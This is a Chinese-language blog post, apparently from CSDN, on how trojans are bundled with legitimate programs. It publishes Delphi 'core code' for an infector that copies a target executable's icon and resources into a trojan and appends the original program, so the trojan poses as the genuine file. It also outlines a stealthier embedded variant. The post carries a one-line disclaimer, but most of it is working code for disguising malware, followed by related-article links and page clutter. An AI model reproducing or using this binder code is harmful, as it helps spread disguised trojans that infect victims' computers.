文件捆绑感染方式解密

最新推荐文章于 2020-05-27 22:38:36 发布
最新推荐文章于 2020-05-27 22:38:36 发布
阅读量534 收藏 1
点赞数
分类专栏: 心得 文章标签: integer file image string dos 解密
最近在研究病毒木马程序的感染和捆绑方式。

  发现文件困绑有多种方式 我只和大家探讨两种方式 一种是附加的方式,一种是内嵌式

  第一种方式 就是将木马程序附加在别的程序头部 也就是说 运行的目标程序是木马

  然后木马程序将原程序解压出来再运行 听说熊猫烧香的程序用的就是这种方法

  这种方式有缺点也有优点

  优点是:

  可以捆绑任何程序

  缺点是:

  运行时需要把目标程序给拷贝出来然后 然后再运行真正的程序 这种方法容易使人察觉出来被捆绑,并且如果目标程序大的话运行速度会比较慢

  实现方法:(Demo下载)

  如果不改变图标,实现方法是非常简单的。

  用文件流的方式 把目标程序写在木马程序后面

  这里提供修改图标的实现方法,就是替换目标程序里的所有资源,如果资源文件被压缩,捆绑将出错

  (目前网络上有很多获取图标的方法,比如用ExtractIcon获取目标程序中的图标 这种方法读取出来的图标

  和原程序的图标是有差别的。 就是颜色会浅一点, 让人一看就知道程序可能被捆绑过了)

  请勿用于病毒传播,这里只贴出核心代码

  【全文】

  function Align(Size, AlignBase: integer): Integer;

  begin

  if Size mod AlignBase <> 0 then

  Result := (Trunc(Size / AlignBase) + 1) * AlignBase

  else

  Result := Size;

  end;

  procedure GetRsrcStream(AFHandle: THandle; var AStream: PStream;var ASectionHeader: TImageSectionHeader);

  var

  I:integer;

  DosHeader: TImageDosHeader;

  NTHeader: TImageNtHeaders; {NtHeader}

  dRead: DWORD;

  begin

  SetFilePointer(AFHandle, 0, nil, FILE_BEGIN);

  ReadFile(AFHandle, DosHeader, SizeOf(TImageDosHeader), dRead, nil);

  //非PE 退出

  if not DosHeader.e_magic = IMAGE_DOS_SIGNATURE then Exit;

  SetFilePointer(AFHandle, DosHeader._lfanew, nil, FILE_BEGIN);

  ReadFile(AFHandle, NTHeader, SizeOf(TImageNTHeaders), dRead, nil);

  //非PE 退出

  if NTHeader.Signature <> IMAGE_NT_SIGNATURE then Exit;

  SetFilePointer(AFHandle, DosHeader._lfanew+SizeOf(TImageNtHeaders), nil, FILE_BEGIN);

  for i := 0 to NTHeader.FileHeader.NumberOfSections - 1 do

  begin

  ReadFile(AFHandle, ASectionHeader, SizeOf(TImageSectionHeader), dRead, nil);

  if ASectionHeader.VirtualAddress = NTHeader.OptionalHeader.DataDirectory[2].VirtualAddress then

  begin

  SetFilePointer(AFHandle, ASectionHeader.PointerToRawData, nil, FILE_BEGIN);

  SetLength(AStream, ASectionHeader.SizeOfRawData);

  ReadFile(AFHandle, AStream[0], ASectionHeader.SizeOfRawData, dRead, nil);

  Exit;

  end;

  end;

  end;

  function StripHighBit(L: Longint): DWORD;

  begin

  Result := L and $7FFFFFFF;

  end;

  function HighBitSet(L: Longint): Boolean;

  begin

  Result := (L and $80000000) <> 0;

  end;

  function IsDirectory(ResourceDirectoryEntryImageResourceDirectoryEntry; BaseEntry: DWORD): boolean;

  begin

  Result := HighBitSet(PImageResourceDirectoryEntry(StripHighBit(ResourceDirectoryEntry^.OffsetToData) +

  BaseEntry + SizeOf(TImageResourceDirectory))^.OffsetToData);

  end;

  function ResourceDataEntry(ResourceDirectoryEntryImageResourceDirectoryEntry; BaseEntry: DWORD)ImageResourceDataEntry;

  begin

  Result := PImageResourceDataEntry(PImageResourceDirectoryEntry(StripHighBit(ResourceDirectoryEntry^.OffsetToData) +

  BaseEntry + SizeOf(TImageResourceDirectory))^.OffsetToData + BaseEntry);

  end;

  function FixRsrc(ResourceDirectoryImageResourceDirectory; BaseEntry,OldVA, NewVA: DWORD):boolean;

  var

  I: Integer;

  ResourceDirectoryEntryImageResourceDirectoryEntry;

  Data: PImageResourceDataEntry;

  begin

  Result := True;

  ResourceDirectoryEntry := PImageResourceDirectoryEntry(DWORD(ResourceDirectory)

  + SizeOf(TImageResourceDirectory));

  for I := 0 to ResourceDirectory^.NumberOfIdEntries + ResourceDirectory^.NumberOfNamedEntries - 1 do

  begin

  if IsDirectory(ResourceDirectoryEntry, BaseEntry) then

  begin

  {目录递归调用,把下级的资源列出来}

  FixRsrc(PImageResourceDirectory(StripHighBit(

  ResourceDirectoryEntry^.OffsetToData)+ BaseEntry),

  BaseEntry, OldVA, NewVA);

  end

  else

  begin

  {资源}

  Data := ResourceDataEntry(ResourceDirectoryEntry, BaseEntry);

  //修正RVA

  Data^.OffsetToData := Data^.OffsetToData - OldVA + NewVA;

  end;

  inc(ResourceDirectoryEntry);

  end;

  end;

  function InfectOneFile(ASrcFileName,ADesFileName,ANewFileName: string): string;

  var

  F,F1,F2: THandle;
dRead: DWORD;

  fsDes, fsSrc, len, i, lastPos, oldSize: integer;

  pRsrc,LoadStream: PStream;

  DosHeader: PImageDosHeader;

  NTHeader: PImageNtHeaders; {NtHeader}

  pSH,pSectionHeader: PImageSectionHeader;

  SectionHeader: TImageSectionHeader;

  Section: PSections;

  fectStream : TResourceStream;

  begin

  Result := ’’;

  pRsrc := nil;

  //打开需要感染的目标文件

  F := CreateFile(PChar(ADesFileName), GENERIC_READ , FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);

  try

  if F = INVALID_HANDLE_VALUE then

  begin

  Result := ’打开目标文件失败!’;

  Exit;

  end;

  //获取目标程序的资源文件

  GetRsrcStream(F, pRsrc, SectionHeader);

  //如果没有资源文件则退出

  if pRsrc = nil then

  begin

  Result := ’读取目标文件资源失败!’;

  Exit;

  end;

  //读取附加程序流

  fectStream := TResourceStream.Create(HInstance,’exe’,’exetype’);

  try

  fsSrc := fectStream.Size;

  SetLength(LoadStream, fectStream.Size);

  fectStream.ReadBuffer(LoadStream[0], fectStream.Size);

  finally

  fectStream.Free;

  end;

  DosHeader := PImageDosHeader(LoadStream);

  NTHeader := PImageNTHeaders(@LoadStream[DosHEader^._lfanew]);

  pSectionHeader := PImageSectionHeader(NTHeader); //指向NtHeader

  Inc(PImageNtHeaders(pSectionHeader)); //指针向前移Sizeof(TImageNtheaders),这时指向节表第一项

  for I := 0 to NTHeader^.FileHeader.NumberOfSections - 1 do

  begin

  //比较是否是指定的节名,如“.rsrc”

  if Strlicomp(@pSectionHeader^.Name, PChar(’.rsrc’), IMAGE_SIZEOF_SHORT_NAME) = 0 then

  begin

  oldSize := pSectionHeader^.SizeOfRawData;

  //修正资源大小

  pSectionHeader^.SizeOfRawData := SectionHeader.SizeOfRawData;

  pSectionHeader^.Misc := SectionHeader.Misc;

  break; //找到了,则退出

  end;

  Inc(pSectionHeader); //取节表下一项,即当前地址加上Sizeof(TImageSectionHeader)

  end;

  //修复资源

  if not FixRsrc(PImageResourceDirectory(pRsrc), DWORD(pRsrc),

  SectionHeader.VirtualAddress,

  pSectionHeader^.VirtualAddress) then Exit;

  NTHeader^.OptionalHeader.DataDirectory[2].Size := SectionHeader.Misc.VirtualSize;

  NTHeader^.OptionalHeader.SizeOfImage :=

  + Align(pSectionHeader^.Misc.VirtualSize + pSectionHeader^.VirtualAddress, NTHeader^.OptionalHeader.SectionAlignment);

  F1 := CreateFile(PChar(ANewFileName), GENERIC_WRITE, 0, nil, CREATE_ALWAYS, 0, 0);

  try

  if F1 = INVALID_HANDLE_VALUE then

  begin

  Result := ’创建新文件失败!’;

  Exit;

  end;

  F2 := CreateFile(PChar(ASrcFileName), GENERIC_READ , FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);

  try

  if F2 = INVALID_HANDLE_VALUE then

  begin

  Result := ’读取目标文件失败!’;

  Exit;

  end;

  fsDes := GetFileSize(F, nil);

  Section := PSections(@LoadStream[$70]);

  Section^.GUID := $58585858;

  Section^.FirstOffset := fsSrc + (SectionHeader.SizeOfRawData - oldSize);

  fsSrc := GetFileSize(F2, nil);

  Section^.FirstSize := fsSrc;

  Section^.LastOffset := Section^.FirstOffset + fsSrc;

  Section^.LastSize := fsDes;

  //写入头部文件

  WriteFile(F1, LoadStream[0], pSectionHeader^.PointerToRawData, dRead, nil);

  WriteFile(F1, pRsrc[0], Length(pRsrc), dRead, nil);

  repeat

  ReadFile(F2, LoadStream[0], Length(LoadStream),dRead, nil);

  WriteFile(F1, LoadStream[0], dRead, dRead, nil);

  until dRead = 0;

  SetFilePointer(F, 0, nil, FILE_BEGIN);

  repeat

  ReadFile(F, LoadStream[0], Length(LoadStream),dRead, nil);

  WriteFile(F1, LoadStream[0], dRead, dRead, nil);

  until dRead = 0;

  finally

  CloseHandle(F2);

  end;

  finally

  CloseHandle(F1);

  end;

finally

  CloseHandle(F);

  SetLength(LoadStream, 0);

  SetLength(pRsrc, 0);

  end;

  end;

  第二程度方式 就是将代码内嵌到目标程序。

  也同样有缺点优点

  优点是

  首先运行的是目标程序。然后再运行木马程序,让人根本无法察觉

  缺点是

  只能感染部分程序
draiden
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
捆绑感染 思路实现
冷风
09-05 1011
这是 写捆绑感染时,随手写的思路记录,本来想写个详细的教程,但看目前情形是完成不了啦 做出的 捆绑器  效果蛮好的 难度不大 稍微记录一下 ...了解了这个思路 自己再做也不困难  捆绑部分 1复制自己到一个临时文件 2添加第一个要捆绑文件文件尾 3添加第二个要捆绑文件文件尾 5分别获取三个文件的长度名称和捆绑标记并写入文件尾部 
文件捆绑感染(一)
08-20 911
 【摘要】最近在研究病毒木马程序的感染捆绑方式。发现文件困绑有多种方式 我只和大家探讨两种方式 一种是附加的方式,一种是内嵌式 第一种方式 就是将木马程序附加在别的程序头部 也就是说 运行的目标程序是木马然后木马程序将原程序解压出来再运行 听说熊猫烧香的程序用的就是这种方法这种方式有缺点也有优点优点是:  可以捆绑任何程序缺点是:  运行时需要把目标程序给拷贝出来然后 然后再运行真正的程序 这种
文件捆绑感染方式编程
广外女生官方BLOG
09-15 880
 近在研究病毒木马程序的感染捆绑方式。 发现文件困绑有多种方式 我只和大家探讨两种方式 一种是附加的方式,一种是内嵌式  第一种方式 就是将木马程序附加在别的程序头部 也就是说 运行的目标程序是木马 然后木马程序将原程序解压出来再运行 听说熊猫烧香的程序用的就是这种方法 这种方式有缺点也有优点 优点是:   可以捆绑任何程序 缺点是:   运行时需要把目标程序给拷贝出来然后 然后再运行真正的程序
PE文件的基本结构-2 NT头
zhangxinrun的专栏
08-24 1239
<br />1 PE文件头(NT文件头)<br />从DOS文件头的_lfanew字段(文件头偏移003ch)得到真正的PE文件头位置[$0000 0100]后,现在来看看它的定义,PE文件头是由IMAGE_NT_HEADERS结构定义的:<br />PImageNtHeaders = ^TImageNtHeaders;<br />_IMAGE_NT_HEADERS = packed record<br />    [$0100]Signature: DWORD;<br />    [$0104]FileH
可执行文件捆绑和分离
jingzhongrong
02-24 2721
多个文件捆绑,为了实现上述功能,可以将主程序中加入分解功能,或者使用一个自解压的控制程序来进行文件的分解。下面以一个自解压控制程序来说明问题:捆绑之后的程序结构如下所示:  自解压控制程序
binder文件捆绑
11-14
【Binder文件捆绑器】是一种工具,主要用于将多个文件合并成一个可执行的文件,以便于分发、存储或传输。这种技术在软件开发和系统管理领域中颇为常见,特别是对于那些希望将应用程序及其依赖项整合在一起的开发者。...
文件捆绑机 .zip
05-25
这种方式可以让用户只需下载和运行一个文件,而不是多个,这对于网络传输和软件安装过程来说更为便捷。同时,它也可以用于隐藏或保护嵌入的文件,因为它们不会直接在磁盘上可见。 然而,文件捆绑机也存在一些潜在...
万能文件免杀捆绑器.rar
10-20
【标题】"万能文件免杀捆绑器.rar"所涉及的知识点主要集中在文件处理和安全技术上,尤其在软件打包和防病毒策略方面。这款工具主要用于将多个文件捆绑在一起,生成一个可执行文件(EXE),同时具备了自定义图标和...
文件捆绑器.zip
12-08
标题“反文件捆绑器.zip”指的是一个压缩包文件,其中包含了一个名为“反文件捆绑器.exe”的可执行程序。这个程序的主要功能是检测并防止文件捆绑现象,特别是针对EXE可执行文件。在信息技术领域,文件捆绑是一种...
荣成文件捆绑克星.zip
12-08
文件捆绑的常见方式包括将恶意代码嵌入到合法程序的安装包中,或者创建伪装成常用软件更新或热门下载的假文件。一旦用户下载并执行这些捆绑文件,恶意软件就会在后台自动安装,可能对用户的计算机系统造成各种危害,...
PE文件 节表IMAGE_SECTION_HEADER的正确定位方法
qingzai_的专栏
08-08 2707
网络上大部分资料对PE文件的节表的定位方式都是下面这样的 1 (LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE + sizeof(IMAGE_FILE_HEADER) + sizeof(IMAGE_OPTIONAL_HEADER): 其意思是这样的: 为了在解释上面的代码之
如何编写一个文件捆绑工具
zgqtxwd的专栏
04-27 1072
<!--google_ad_client = "pub-2947489232296736";/* 728x15, 创建于 08-4-23MSDN */google_ad_slot = "3624277373";google_ad_width = 728;google_ad_height = 15;//--><script type="text/javascript"
如何实现可执行文件感染
my2005lb的专栏
04-11 1160
  做了一个小程序实现的是对可执行程序的感染,原理很简单.test.exe是我们要感染文件, 我们要把我们自己的一个文件添加到其前面去,就实现了如果用户点击这一文件,先执行我们的程序.其相关代码如下:#include#include#includevoid main(){ FILE *fp ; FILE *fp1; if( ( fp = fopen("test1.exe","wb
[网络安全自学篇] 七十九.Windows PE病毒原理、分类及感染方式详解
杨秀璋的专栏
05-20 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了XSS跨站脚本攻击案例,主要内容包括XSS原理、不同类型的XSS、XSS靶场9道题目、如何防御XSS。这篇文章将介绍Windows PE病毒, 包括PE病毒原理、分类及感染方式详解,并通过案例进行介绍。基础性文章,希望对您有所帮助~
PE中节表IMAGE_SECTION_HEADER详(四)
想喝奶茶的胖大海
12-27 969
typedef struct _IMAGE_SECTION_HEADER { BYTE Name[IMAGE_ SIZEOF_ SHORT_ NAME]; //ASCI字符串 可自定义只截取8个 union { DWORD PhysicalAddress; DWORD VirtualSize; } Mlisc; DWORD VirtualAddress;//在内存中的偏移地址,加上Im...
C语言编程获取PE文件Section_Header
一根火柴博客
02-02 1335
#include #include #include void viewImageSectionHeaderCharacteristics(DWORD); int _tmain(int argc, TCHAR *argv[]) { PIMAGE_DOS_HEADER pImageDosHeader; PIMAGE_NT_HEADERS pImageNTHeaders; PIMAGE
incaseformat病毒解决方法
热门推荐
小张小张啥也不会
05-27 6万+
与incaseformat斗争的全记录解决方法incaseformat.txt带来的问题对病毒深入研究总结 解决方法 我也是百度谷歌上查了很久,发现全网就那么一个方法,大家都是互相盗,而且这方法太旧了,基本不能用。剩下的基本就是推荐你直接放弃治疗,重装系统的…而且百度的方法也不适合我这种从外面通过U盘感染的患者。 于是我根据网友们的想法自己摸索了一个方法出来,希望能帮到大家: 使用我的方法需要满足一个条件,就是你的感染原因是和我一样的,也就是说你的被感染文件夹内的incaseformat.txt是可以自由删
签入式捆绑
08-20 1127
 【摘要】上次写到使用附加捆绑文件方式. 这次介绍使用签入式捆绑签入式捆绑的原理也很简单,也是把木马程序附加到程序尾部 然后在原程序里添加一个代码节用来把木马程序释放出来. 最后将原程序的入口点改成添加节的起始地址由于这种试会改变原程序的大小,并且和程序运行的环境有关.所以 .net或其它的虚拟机程序是不能被运行的.还有一种就是有附加数据的程序  因为改变了文件的大小 如果强行捆绑 有可能会使原
c++切断流与文件捆绑
最新发布
07-09
在C++中,可以使用流对象来读写文件。当你完成文件的读写操作后,你需要切断流与文件捆绑,以释放资源并...无论你选择哪种方式,切断流与文件捆绑都是为了确保资源被正确释放,文件被关闭,以及数据被正确写入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值